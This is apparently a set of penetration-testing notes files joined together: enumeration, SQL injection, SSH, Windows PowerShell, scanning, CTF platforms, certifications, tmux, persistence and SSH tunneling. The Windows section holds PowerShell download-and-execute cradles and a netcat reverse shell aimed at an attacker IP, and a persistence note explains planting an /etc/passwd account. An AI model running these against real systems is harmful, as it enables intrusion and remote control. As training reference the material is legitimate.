Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ) 69 | 70 | Wordpress enumeration: `wpscan --url $url [--disable-tls-checks]` 71 | 72 | pull the Google cached copy of a webpage if it is not loading: `cache:https://$url` 73 | 74 | virtual host routing: substitute the hostname for the ip to get different results 75 | 76 | gobuster: 77 | 78 | ```bash 79 | gobuster dir -u $url -w $wordlist -l -x php -t 20 80 | [dir = directory mode (gobuster 3 syntax), -l include response length, -x append .php to searches, -t threads] 81 | ``` 82 | 83 | hydra against http wordpress login walkthrough: [IppSec:HacktheBox - Apocalyst](https://www.youtube.com/watch?v=TJVghYBByIA) 84 | 85 | ## SQL 86 | 87 | blind sql injection UNION queries: [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=_csbKuOlmdE) use `CONCAT("x","x")` 88 | 89 | get a shell from the mysql client: `\! /bin/sh` 90 | 91 | [SQL Injection Cheatsheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) 92 | 93 | ## DNS 94 | 95 | DNS reverse lookup recon: `dnsrecon -r $ip_range -n $nameserver` 96 | 97 | DNS zone transfer: `dig axfr $domain @$nameserver` 98 | 99 | add a DNS server: `/etc/resolv.conf {nameserver $ip}` 100 | 101 | add Hosts: `/etc/hosts` 102 | 103 | ## Steganography 104 | 105 | extract files from stego'd files: `binwalk -Me $file` 106 | 107 | ## SSH 108 | 109 | generate an ssh key for remote access: 110 | 111 | ```bash 112 | ssh-keygen -f $keyfile; cat $keyfile.pub 113 | #copy the public key to the remote host, then on the remote host (in /home/$user/): 114 | mkdir -p ~/.ssh && echo "$pubkey" >> ~/.ssh/authorized_keys   # >> so existing keys are kept 115 | chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys             # sshd ignores keys in group/world-writable files 116 | ssh -i $keyfile $user@$host 117 | ``` 118 | 119 | generate a public key from a private key: 120 | 121 | ```bash 122 | ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub 123 | 124 | #As a side note, the comment of the public key is lost, so you need to edit ~/.ssh/id_rsa.pub 125 | #and append a comment to the first line with a space between the key data and the comment. An example public key is shown truncated below. 
126 | 127 | "ssh-rsa AAAA..../VqDjtS5 ubuntu@ubuntu" 128 | ``` 129 | 130 | If the connection is dropped right after connecting (usually a startup file such as `.bashrc` killing the session): 131 | 132 | * Don't use bash for this session, try dash \(or /bin/sh\): `ssh 127.0.0.1 /bin/dash` 133 | * Use bash with command options to disable processing of startup files: 134 | 135 | ```bash 136 | ssh 127.0.0.1 "bash --noprofile --norc" 137 | ``` 138 | 139 | ## Unsorted 140 | 141 | shortcut for all ports: `nmap -p-` 142 | 143 | Firefox Browser plugins: Tampermonkey \(userscript manager\); Cookie Manager+; 144 | 145 | signing APK files: [IppSec:HHC2016 - Debug](https://www.youtube.com/watch?v=fcemTQaosOQ) 146 | 147 | view hex of a file only: `xxd -p $file` 148 | 149 | reverse from hex: `xxd -r -p $hexfile > $outfile` 150 | 151 | vim: 152 | 153 | * Learn vim: `vimtutor` 154 | * [https://www.youtube.com/watch?v=OnUiHLYZgaA](https://www.youtube.com/watch?v=OnUiHLYZgaA) 155 | * vim plugins: fuzzy finder plugin ctrlp /// surround.vim 156 | 157 | msfvenom custom exploit making: \[Ippsec:HacktheBox - Granny & Grandpa\] 158 | 159 | ```bash 160 | msfvenom -p $payload LHOST=$attacker_ip LPORT=$port -f $format -o $outfile   # msfvenom -l payloads / -l formats to list the options 161 | ``` 162 | 163 | injecting IPs when '.' 
is disallowed: convert dotted\_decimal to its single decimal value (most IP stacks accept `http://3232235777/` for 192.168.1.1) -[ip2dh](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py) 164 | 165 | [AndroidAssetStudio](https://romannurik.github.io/AndroidAssetStudio/index.html) 166 | 167 | port knocking: [Ippsec:HackTheBox - Nineveh](https://www.youtube.com/watch?v=K9DKULxSBK4) 168 | 169 | * iptables knockd 170 | 171 | ```bash 172 | # one probe per knock port, in sequence (--max-retries 0 keeps it to a single packet each) 173 | for i in $port1 $port2 $port3; do nmap -Pn -p $i --host-timeout 201ms --max-retries 0 $target; done 174 | ``` 175 | 176 | recursively download all files in a hosted folder: `wget -r $url` 177 | 178 | [Hurricane Electric ISP](http://he.net/): Ippsec uses it with IPv6 as a pseudo-VPN in [HTB:Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 179 | 180 | IPv6 primer [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 181 | 182 | ```text 183 | fe80::/10 - febf:ffff:ffff:ffff:ffff:ffff:ffff:ffff Link-Local (IPv4 equivalent: 169.254.x.x APIPA) 184 | (built from the MAC address on Linux, 7th bit flips, adds ff:fe in the center) 185 | 186 | fc00::/7 - fdff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Unique Local Unicast (IPv4 equivalent: 10.x.x.x, 172.16.x.x, 192.168.x.x) 187 | 188 | 2000::/3 - Global Unicast, routable 189 | 190 | ff02::1 - Multicast All Nodes 191 | 192 | ff02::2 - Multicast All Routers 193 | ``` 194 | 195 | ip6tables - iptables for ipv6 196 | 197 | -------------------------------------------------------------------------------- /archive/windows.md: -------------------------------------------------------------------------------- 1 | # Windows 2 | 3 | living off the land binaries: [LOLBAS](https://lolbas-project.github.io/) 4 | 5 | ## Enumeration 6 | 7 | Windows Privilege Escalation Enumeration Script: [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) 8 | 9 | Little bit o' everything: [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/) 10 | 11 | ## Unsorted 12 | 13 | Powershell full path: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` (from a 32-bit process on 64-bit Windows use `C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe`, which redirects to the 64-bit System32) 14 | 15 | Powershell "wget" and 
execute remote code: 16 | 17 | ```text 18 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://$attacker_ip:$port/$script.ps1')" 19 | ``` 20 | 21 | Powershell execution-policy bypass (the script arrives on stdin, so the policy that governs .ps1 files is never applied) \[can embed in php too!\]: 22 | 23 | ```text 24 | echo IEX(New-Object Net.WebClient).DownloadString('http://$attacker_ip/$script.ps1') | powershell -noprofile - 25 | ``` 26 | 27 | Powershell reverse shell and exploit scripts: nishang [Ippsec:HacktheBox - Optimum](https://www.youtube.com/watch?v=kWTnVBIpNsE) 28 | 29 | Netcat reverse shell \(after uploading the binary!\): `nc64.exe -e cmd $attacker_ip $port` 30 | 31 | tools: [https://specterops.io/resources/research-and-development](https://specterops.io/resources/research-and-development) 32 | 33 | easy windows shell: unicorn.py [trustedsec/unicorn](https://github.com/trustedsec/unicorn) [HackTheBox - Arctic](https://www.youtube.com/watch?v=e9lVyFH7-4o) 34 | 35 | system information: `sysinfo` (Meterpreter; the native equivalent is `systeminfo`) 36 | 37 | Get user id: `getuid` (Meterpreter; natively `whoami /all`) 38 | 39 | Powershell privilege escalation: 40 | 41 | * [PowerUp.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) from PowerShellEmpire 42 | * Sherlock.ps1 43 | 44 | [fuzzbunch](https://github.com/peterpt/fuzzbunch): exploit tool similar to metasploit 45 | 46 | check what updates are installed: `type C:\Windows\WindowsUpdate.log` (older Windows; on Windows 10+ the log is no longer plain text, so use `wmic qfe list` or `Get-HotFix` instead) 47 | 48 | serve a share from linux \[like SimpleHTTPServer, but for SMB\]: `impacket-smbserver -smb2support $share_name $local_dir` 49 | 50 | -------------------------------------------------------------------------------- /basic-enumeration.md: -------------------------------------------------------------------------------- 1 | # Basic Initial Enumeration 2 | 3 | ## Host Discovery 4 | 5 | ### Using nmap 6 | 7 | ```bash 8 | nmap -sn -v -T4 $ip/$mask 9 | ``` 10 | 11 | ### Using netdiscover 12 | 13 | ```bash 14 | netdiscover -r $ip/$mask 15 | ``` 16 | 17 | ### Using ping 18 | 19 | tab - windows 20 | ``` 21 | for /L %i in (1,1,255) do @ping.exe -n 1 -w 50 10.10.10.%i | findstr TTL 22 | ``` 23 | 24 | tab - linux 25 | 26 | ```bash 27 | for x in {1..255}; do ping -c 1 -W 1 10.10.10.$x | grep TTL; done 28 | ``` 29 | 30 | Change the IP `10.10.10.` to match the network you are scanning. Both loops scan a /24 network by default and will need some customization for other size networks. Note that the timeout units differ: Windows `ping -w 50` waits 50 ms, while on Linux `-w` is a deadline in seconds, so use `-W 1` (a one-second reply timeout) there or every dead host costs a long wait. 31 | 32 | 33 | ## Port Enumeration 34 | 35 | ```bash 36 | ports=$(nmap -Pn -n -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f1 | tr '\n' ',' | sed 's/,$//') 37 | 38 | nmap -vvv -n -p $ports -sC -sV $ip 39 | ``` 40 | 41 | if a full details scan is needed: 42 | ```bash 43 | nmap -vvv --reason -sCV -Pn -A --osscan-guess --version-all -p $ports -oA host.nmap-full $ip 44 | ``` 45 | 46 | ### Simple bash port scan script 47 | 48 | ```bash 49 | for ip in {1..254}; 50 | do for port in {1..65535}; 51 | do (timeout 1 bash -c "echo >/dev/tcp/10.10.10.$ip/$port") >& /dev/null \ 52 | && echo "10.10.10.$ip:$port is open"; 53 | done; 54 | done; 55 | echo "Scan complete." 56 | ``` 57 | 58 | The IP range and ports to scan can of course be modified to fit the situation. The `timeout 1` matters: without it a filtered port stalls the loop until the kernel's TCP connect timeout expires. Scanning all ports on a class C range will take a while. Try not to do this as it is very noisy. 59 | -------------------------------------------------------------------------------- /hackers-rest.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Test 3 | --- 4 | 5 | # Test 6 | 7 | This is a test...More to come soon! 8 | 9 | -------------------------------------------------------------------------------- /hacking-methodology.md: -------------------------------------------------------------------------------- 1 | # Hacking Methodology 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

## MITRE ATT\&CK

{% embed url="https://attack.mitre.org" %}

| [Initial Access](https://attack.mitre.org/tactics/TA0001) | [Execution](https://attack.mitre.org/tactics/TA0002) | [Persistence](https://attack.mitre.org/tactics/TA0003) | [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) | [Defense Evasion](https://attack.mitre.org/tactics/TA0005) | [Credential Access](https://attack.mitre.org/tactics/TA0006) | [Discovery](https://attack.mitre.org/tactics/TA0007) | [Lateral Movement](https://attack.mitre.org/tactics/TA0008) | [Collection](https://attack.mitre.org/tactics/TA0009) | [Command and Control](https://attack.mitre.org/tactics/TA0011) | [Exfiltration](https://attack.mitre.org/tactics/TA0010) | [Impact](https://attack.mitre.org/tactics/TA0040) |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |

### Categories

The hacking methodology categories align with the enterprise attack tactics in the MITRE ATT\&CK matrix.
The categories are:

* **Initial access** - Gaining initial entry to the target network, usually involving password-guessing, exploits, or phishing emails
* **Execution** - Launching attacker tools and malicious code, including RATs and backdoors
* **Persistence** - Creating autostart extensibility points (ASEPs) to remain active and survive system restarts
* **Privilege escalation** - Obtaining higher permission levels for code by running it in the context of a privileged process or account
* **Defense evasion** - Avoiding security controls by, for example, turning off security apps, deleting implants, and running rootkits
* **Credential access** - Obtaining valid credentials to extend control over devices and other resources in the network
* **Discovery** - Gathering information about important devices and resources, such as administrator computers, domain controllers, and file servers
* **Lateral movement** - Moving between devices in the target network to reach critical resources or gain network persistence
* **Collection** - Locating and collecting data for exfiltration
* **Command and control** - Connecting to attacker-controlled network infrastructure to relay data or receive commands
* **Exfiltration** - Extracting data from the network to an external, attacker-controlled location

## General methodology

* Log all commands of the current session

  ```
  script $session_name.log

  #when finished
  exit
  ```
* Use Joplin, OneNote, CherryTree or another notetaking program to document findings
* Set the Target IP Address to the `$ip` system variable

  ```
  export ip=target_ip
  ```
* Run `nmap -sCV` for all TCP and UDP ports
* For every open port TCP/UDP
  * Find service and version
  * Find known service bugs
  * Find configuration issues
  * Do banner grabbing
* Google/Web-search
  * Every unknown service/program
  * Every error message
  * Every URL path
  * Every parameter to find versions/apps/bugs
  * Every service version + exploit db
  * Every service version + vulnerability
* `searchsploit` every service
* If app has authentication:
  * User enumeration
  * Password brute force
  * Default credentials google search
* Run nmap vuln scan
* Run metasploit enum
* Run metasploit exploits

## Privilege Escalation Standard Operating Procedures

Proper and thorough enumeration is the key to a successful engagement. Privilege escalation is all about:

* Collecting - Enumeration, more enumeration, and some more enumeration.
* Processing - Sort through data, analyze, and prioritize.
* Searching - Know what to search for and where to find the exploit code.
* Adapting - Customize the exploit so it fits. Not every exploit works for every system "out of the box".
* Trying - Get ready for (lots of) trial and error.

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

-------------------------------------------------------------------------------- /hands-on-practice.md: --------------------------------------------------------------------------------

---
description: >-
  Sites and resources for gaining the most important experience: hands-on
  practical application.
---

# Hands-on Practice

## **Capture The Flag (CTF)**

In **cybersecurity**, a **Capture The Flag (CTF)** is a **hands-on competition** designed to simulate real-world hacking scenarios. Participants, who are often **security professionals, ethical hackers, students, or red teams**, attempt to solve technical challenges that test their **offensive and/or defensive skills**.
### **Types of CTF Competitions**

CTFs can vary in format but typically fall into three main categories:

1. **Jeopardy-Style** – Players solve challenges in categories like **cryptography, reverse engineering, web exploitation, and forensics** to earn points.
2. **Attack-Defense** – Teams defend their own systems while attacking others, simulating **real-world red vs. blue team scenarios**.
3. **Boot2Root / Puzzle-Based** – Participants must gain root access to a vulnerable machine or solve multi-step hacking challenges.

### **CTFs for Cyber Training**

For cybersecurity professionals, CTFs provide an opportunity to:

- **Practice offensive security** techniques like **privilege escalation, exploit development, and lateral movement**.
- **Learn real-world tactics** used by adversaries in penetration tests.
- **Improve technical agility** in areas like **reverse engineering malware, bypassing security controls, and social engineering**.
- **Enhance teamwork** in scenarios that mimic **cybercriminals** and **advanced persistent threats (APT)**.

CTFs are also widely used for **cybersecurity education**, **hiring assessments**, and **upskilling professionals**. Many competitions, such as **DEFCON CTF, Hack The Box, and PicoCTF**, provide an immersive experience to sharpen security expertise.

Here is a list of some of the more popular platforms for hands-on CTF training:

| **Site** | **Description** | **CTF Type** |
|---------|---------------|-------------|
| [247CTF](https://247ctf.com/) | Provides unique challenge instances for each player, eliminating the need for VPNs or shared environments. Players can start, stop, and restart challenges at any time. | **Jeopardy-Style** |
| [CTFtime](https://ctftime.org/) | A comprehensive archive of past and upcoming **Capture The Flag (CTF)** competitions, including team rankings, statistics, and event details. | **CTF Aggregator** (Tracks multiple formats) |
| [OverTheWire Wargames](http://overthewire.org/wargames/) | Offers a variety of **security wargames** to help players learn and practice cybersecurity concepts in a structured, gamified environment. | **Puzzle-Based / Boot2Root** |
| [OverTheWire Warzone](https://overthewire.org/warzone/) | A simulated **IPv4 Internet environment** where all connected devices are targets for hacking. Players can connect their own vulnerable systems for testing. | **Attack-Defense** |
| [UnderTheWire](https://www.underthewire.tech/) | Focuses on **Windows PowerShell** training through interactive wargames, helping users develop scripting and automation skills. | **Jeopardy-Style** |
| [Challenges.re](https://challenges.re/) | Created by Dennis Yurichev, this site focuses on **reverse engineering challenges**, complementing his book *Reverse Engineering for Beginners*. | **Jeopardy-Style (Reverse Engineering)** |
| [ROP Emporium](https://ropemporium.com/) | Teaches **Return-Oriented Programming (ROP)** through structured challenges designed to improve exploit development skills. | **Puzzle-Based / Exploit Development** |
| [PicoCTF](https://picoctf.com/) | A beginner-friendly **CTF competition** designed for students, featuring challenges in **reverse engineering, cryptography, and web security**. | **Jeopardy-Style** |
| [CTF365](https://ctf365.com/) | A **cyber range** where users build and defend their own servers while attacking others, simulating real-world cybersecurity scenarios. | **Attack-Defense** |
| [Hack The Box](https://www.hackthebox.eu/) | An **interactive penetration testing lab** with constantly updated challenges, including **real-world scenarios and CTF-style puzzles**. | **Boot2Root / Puzzle-Based** |
| [VulnHub](https://www.vulnhub.com/) | Provides **vulnerable virtual machines** for hands-on security training, allowing users to practice penetration testing techniques. | **Boot2Root / Puzzle-Based** |
| [Root Me](https://www.root-me.org/en/Challenges) | Offers a wide variety of **security challenges**, including **web exploitation, cryptanalysis, forensic analysis, and reverse engineering**. | **Jeopardy-Style** |
| [Exploit Education](https://exploit.education/) | Formerly *Exploit Exercises*, this site provides **virtual machines and challenges** focused on **privilege escalation, exploit development, and debugging**. | **Boot2Root / Exploit Development** |
| [Hack This](https://www.hackthis.co.uk/) | A platform for learning **hacking and network security**, featuring challenges that simulate real-world vulnerabilities. | **Jeopardy-Style** |
| [W3Challs](https://w3challs.com/) | A **real-world hacking challenge** platform with no guessing or simulation, covering multiple offensive security topics. | **Jeopardy-Style** |
| [Pwnable.kr](http://pwnable.kr/) | A **pwn-focused wargame** site offering challenges related to **binary exploitation, reverse engineering, and system hacking**. | **Boot2Root / Exploit Development** |
| [Pwnable.tw](https://pwnable.tw/) | Similar to Pwnable.kr, this site provides **binary exploitation challenges** with a scoring system based on difficulty. | **Boot2Root / Exploit Development** |

## Certifications for Offensive Security Professionals

Certifications are also available from many vendors to validate penetration testing, ethical hacking, and exploit development skills. These certifications help professionals demonstrate their expertise in network security, red teaming, and vulnerability assessment, making them valuable challenges to pursue. These can often help "get you in the door" when applying for jobs.
56 | 57 | Below is a table comparing some of the popular offensive security certifications: 58 | 59 | | **Vendor** | **Certification** | **Description** | **Price** | **Pros** | **Cons** | 60 | |------------|------------------|----------------|------------|----------|----------| 61 | | **Offensive Security** | **OSCP (Offensive Security Certified Professional)** | A **hands-on pentesting certification** requiring a **24-hour practical exam** and report writing. Focused on **real-world attack scenarios** using Kali Linux. | ~$1,599 | Highly respected, strong industry recognition, hands-on exam | Extremely challenging, steep learning curve, only "entry level" | 62 | | **Offensive Security** | **OSCE3 (Offensive Security Certified Expert)** | Advanced certification covering **exploit development, red teaming, and advanced pentesting techniques**. | ~$5,499 | Deep focus on **exploit development**, highly respected | Extremely difficult, requires OSCP-level expertise | 63 | | **Offensive Security** | **OSWE (Offensive Security Web Expert)** | Focuses on **white-box web application security**, requiring candidates to analyze source code and exploit vulnerabilities. The exam is **48 hours long**. | ~$1,499 | Highly specialized in **web app security**, strong industry recognition | Requires deep knowledge of **web application security and coding** | 64 | | **TCM Security** | **PNPT (Practical Network Penetration Tester)** | A **real-world pentesting exam** covering **Active Directory exploitation, lateral movement, and report writing**. | ~$399 | Affordable, realistic pentesting scenarios, includes reporting | Less recognized than OSCP, limited advanced exploitation | 65 | | **Pentester Academy** | **CRTP (Certified Red Team Professional)** | Specializes in **Active Directory attacks, privilege escalation, and lateral movement techniques**. 
| ~$249 | Strong Windows AD exploitation focus, affordable | Limited coverage of web and network pentesting | 66 | | **Hack The Box** | **CPTS (Certified Penetration Testing Specialist)** | A **hands-on pentesting certification** covering **network security, Active Directory exploitation, and web application attacks**. | ~$299 | Affordable, practical exam, good for beginners | Less recognized than OSCP, newer certification | 67 | | **GIAC (Global Information Assurance Certification)** | **GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)** | Covers **exploit development, buffer overflows, and reverse engineering**. | ~$8,000 | Deep focus on **exploit development**, highly technical | Extremely expensive | 68 | | **eLearnSecurity (INE Security)** | **CPTS (Certified Penetration Testing Specialist)** | Covers **network security, web exploitation, and privilege escalation** with a **practical exam**. | ~$350 | Well-rounded pentesting coverage, hands-on exam | Less industry recognition compared to OSCP | 69 | | **eLearnSecurity (INE Security)** | **eJPT (eLearnSecurity Junior Penetration Tester)** | Entry-level pentesting certification covering **network security, web exploitation, and basic enumeration**. | ~$200 | Beginner-friendly, practical exam | Not recognized for senior pentesting roles | 70 | | **Mile2** | **CPTC (Certified Penetration Testing Consultant)** | Focuses on **enterprise-level pentesting**, including **report writing and compliance**. | ~$1,500 | Strong emphasis on **consulting and reporting**, good for senior roles | Less technical than OSCP, geared toward **business-oriented pentesting** | 71 | | **International Council of E-Commerce Consultants (EC-Council)** | **CEH (Certified Ethical Hacker)** | Covers **ethical hacking fundamentals**, tools, and methodologies via a **multiple-choice exam**. 
| ~$1,199 | Well-known globally, only for beginners | Not a practical exam, focuses more on theory than hands-on skills, terrible course material, not worth the price | 72 | 73 | 74 | ## Thanks 75 | 76 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 77 | -------------------------------------------------------------------------------- /linux-1/linux-hardening/tmux-screen-cheatsheet.md: -------------------------------------------------------------------------------- 1 | # TMUX/Screen Cheatsheet 2 | 3 | TMUX and screen are extremely useful tools for maintaining sessions through reverse tunnels and other fragile connections. They allow for reconnection of sessions that become detached (disconnected) where the process is still running but there was some sort of network interruption. 4 | 5 | They both have a very handy function where each window can be split either vertically or horizontally in to separate panes. I am not sure what the actual limit to the number of panes may be, but I regularly split my windows into four panes comfortably. 6 | 7 | Screen is fairly ubiquitous in most Linux distributions, however TMUX is a program that will likely have to be installed on the machine you are connecting to. Screen is fairly old and does not get feature updates anymore (as far as I am aware), while TMUX is newer and has many plugins which can be used to extend its functionality. Learning both will ensure you are ready no matter which may be present on the system you log into. 8 | 9 | {% hint style="info" %} 10 | **`^`** is shorthand for the **`CTRL`** key, so **`^b`** == **`CTRL + b`**. 11 | 12 | \----- 13 | 14 | **`^a`** is the default meta-key for **`screen`**, while **`^b`** is the default meta-key for **`TMUX`**. 
{% endhint %}

## Session Management

| Action | TMUX | Screen |
| --- | --- | --- |
| Start a new session | `tmux`, `tmux new`, `tmux new-session` | `screen` |
| Create a new named session | `tmux new -s ` | |
| Re-attach a (local) detached session | `tmux attach`, `tmux attach-session` | `screen -r` |
| Re-attach an attached session (detaching it from elsewhere) | `tmux attach -d`, `tmux attach-session -d` | `screen -dr` |
| Re-attach an attached session (keeping it attached elsewhere) | `tmux attach`, `tmux attach-session` | `screen -x` |
| Detach from currently attached session | `^b d`, `^b :detach` | `^a d`, `^a ^d`, `^a :detach` |
| Detach and log out | | `^a f`, `^a ^f` |
| List sessions | `^b s`, `tmux ls`, `tmux list-sessions` | `screen -ls` |

## Pane Management

| Action | TMUX | Screen |
| --- | --- | --- |
| Split pane horizontally | `^b "` | `^a S` |
| Split pane vertically | `^b %` | `^a \|` |
| Switch to another pane | `^b o` | `^a tab` |
| Kill the current pane | `^b x` | `^a X` |
| Close all panes except the current one | `^b !` | `^a Q` |
| Swap location of panes | `^b ^o` | N/A |
| Show time | `^b t` | ----- |
| Show numeric identifier for all panes | `^b q` | ----- |

## Window Management

| Action | TMUX | Screen |
| --- | --- | --- |
| Rename window | `^b , <new_name>`, `^b :rename-window <new_name>` | `^a A ` |
| Create new window | `^b c` | `^a c`, `^a ^c` |
| List windows | `^b w` | `^a w` |
| List windows (with selection menu) | ----- | `^a "` |
| Go to window $num | `^b $num` | `^a $num` |
| Go to previously active window | `^b l` | `^a ^a` |
| Go to next window | `^b n` | `^a n` |
| Go to previous window | `^b p` | `^a p` |

## MISC

| Action | TMUX | Screen |
| --- | --- | --- |
| See key bindings | `^b ?` | `^a ?` |
| Enter "scroll mode" | `^b [` | `^a [` |
| Enter "Vim mode" | `^b ]`; search with `?`; hit `[spacebar]` to start copying text; use `^b ]` to paste | |
| Scroll up in "scroll mode" | `[page up]`, `[up arrow]` | `^b` for page up, `k` for one line |
| Scroll down in "scroll mode" | `[page down]`, `[down arrow]` | `^f` for page down, `j` for one line |
| Exit "scroll mode" | `q` | `ESC` |
| Exit current shell | `^d` | `^d` |

### Ippsec Tmux Notes

Config from [ippsec](https://www.youtube.com/watch?v=Lqehvpe\_djs).

```
#set prefix
set -g prefix C-a
bind C-a send-prefix
unbind C-b

set -g history-limit 100000
set -g allow-rename off

bind-key j command-prompt -p "Join pane from:" "join-pane -s '%%'"
bind-key s command-prompt -p "Send pane to:" "join-pane -t '%%'"

set-window-option -g mode-keys vi

run-shell /opt/tmux-logging/logging.tmux
```

First press the prefix `ctrl + b` (default; Ippsec changes it to `ctrl + a`), then release the keys and press the combination you want.

Join panes: `prefix + s #`

Zoom in/out to panes: `prefix + z`

Kill session by tag: `tmux kill-session -t X`

Kill pane: `prefix + &`

#### tmux plugins:

* tmux logging plugin (get this!!) can save a log of tmux windows
* [better mouse mode](https://github.com/NHDaly/tmux-better-mouse-mode)

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

-------------------------------------------------------------------------------- /linux-1/linux-redteam/README.md: --------------------------------------------------------------------------------

---
description: 'Sorted Linux notes, need to separate to different pages and reorganize'
---

# Red Team Notes

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Linux

Website for searching for shells through random programs such as `vi` "living off the land binaries": [GTFObins](https://gtfobins.github.io/)

## Remote Code Execution

Run commands on a remote system without an interactive shell through SSH with a "Herefile" (heredoc). `HERE` can be any word, but the block must begin and end with the same word. [https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/](https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/)

```text
ssh @ << HERE


HERE
```

## Misc Linux

Raw memory location so no files on disk: `/dev/shm/`

list all running commands:

```bash
ps -eo command
# change the field delimiter to \n instead of whitespace (loop by line):
IFS=$'\n'
# then loop through each line of output:
for i in $(ps -eo command); do echo $i; done
```

### Cat file directly to clipboard

[https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents](https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents) script to copy the contents of a file directly to the clipboard; save it in a PATH location then enjoy!

```text
#! /bin/bash
# quote "$@" so file names containing spaces are passed through intact
xclip -selection clipboard -i "$@"
```

'new' netstat: `ss -lnp | grep 9001` \#check if any connections on port 9001

copy files to local machine without file transfer:

```bash
base64 -w 0 /path/of/file/name.file
#copy base64 then:
echo -n | base64 -d > filename.file
```

pretty print JSON text in console \([https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/](https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/)\).
Pipe the JSON output to `jq`. Example from NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq`

### Check encoding of a text file

`vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' ` check encoding of a text file \(needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_\) [https://vim.fandom.com/wiki/Bash\_file\_encoding\_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) \(how to make an alias for the above command\)

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

-------------------------------------------------------------------------------- /linux-1/linux-redteam/persistance.md: --------------------------------------------------------------------------------

# Persistence

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

## Cron

## Startup Scripts

Add script to run at startup: `update-rc.d defaults` (needs 755 permissions)

## Accounts

### Add Account & Password to /etc/passwd

* Generate password with `openssl passwd -1 -salt $username $password`
* Add to `/etc/passwd` file which is in the format:
  * `$UserName:$generated_password:$UID:$GID:$comment:$home_dir:$default_shell`
  * `$comment` is usually the user's Full Name. Check the `/etc/passwd` file to ensure you match local standards.
  * (assumes you have write privilege to this file!)

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

-------------------------------------------------------------------------------- /linux-1/linux-redteam/pivoting-lateral-movement.md: --------------------------------------------------------------------------------

# Pivoting/Lateral Movement

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

## SSH Tunneling 101

```bash
# SSH local port forward to reach an_internal_server_ip:port via server_ip
ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80
# Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only

# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip
ssh tunneler@server_ip -p 2222 -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only

# ProxyJump ssh to an_internal_host via ssh server_ip
ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip

# SSH remote port forward to send traffic back to our local port from a port of server_ip
# (-R, not -L: the listener is opened on the remote side)
ssh whistler@server_ip -p 2222 -R 58671:localhost:1234
# this will listen on port 58671 of server_ip and tunnel the traffic back to us on localhost:1234; nc -nlvp 1234 to receive for example

# Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_box
ssh -J firstuser@1st_box:2222 seconduser@2nd_box -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only

# bypass the host-key prompt when you only have a non-interactive shell
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"
```

### SSH reverse tunneling

```bash
